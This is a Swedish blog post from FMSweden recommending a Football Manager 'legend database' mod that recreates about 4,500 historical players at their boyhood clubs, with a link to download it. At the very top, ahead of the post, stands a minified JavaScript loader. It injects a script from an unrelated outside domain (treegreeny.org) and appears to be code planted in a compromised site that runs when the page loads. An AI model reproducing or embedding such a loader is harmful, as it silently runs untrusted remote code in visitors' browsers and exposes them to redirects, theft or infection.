;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: legenddatabas – FMSweden
Meny Stäng

Veckans inspiration: legenddatabas

Ni som lyssnat på det senaste avsnittet av FM-podden kommer kanske ihåg att jag nämnde flexibilitet som en viktig faktor för valet av veckans inspiration. Dessutom fick vi en lyssnarfråga angående en så kallad legenddatabas, där gamla spelare återskapats i yngre dagar och placerats i sina respektive moderklubbar. Eftersom ingen av oss tre i podden hade testat en sådan tycker jag det är på plats att vi rekommenderar den här för att folk ska kunna få upp ögonen för formatet. Kanske någon till och med har testat den redan och kan hjälpa till med att svara på lyssnarfrågan? Skriv gärna det i kommentarsfältet i sådana fall.

Så vad går det hela ut på egentligen? Först och främst bör det nämnas att det finns flertalet olika varianter, men den som jag tar upp här verkar vara den mest genomarbetade. Den går att ladda ner HÄR. Totalt innehåller den cirka 4500 legendariska spelare. Både större och mindre ligor respektive lag är representerade, där svenska Åtvidabergs FF och IFK Göteborg nämns som exempel. Spelare från 50-talet till 00-talet finns att välja emellan, vilket medför en stor bredd så väl geografiskt som tidsmässigt. Vidare är CL och EL anpassat efter vilka lag som haft sina storhetstider historiskt sett. Detsamma gäller även nationskoefficienter och världsranking med mera. Sist men inte minst finns ett specialanpassat facepack för ändamålet. Instruktioner för hur man laddar ner databas och facepack finns i ovanstående länk. Jag lägger den i sin helhet längst ner här för säkerhets skull. Lycka till med era saves!

https://www.fmscout.com/a-return-of-the-legends-fm20.html

 

Please wait...

Liknande Inlägg

Lämna ett svar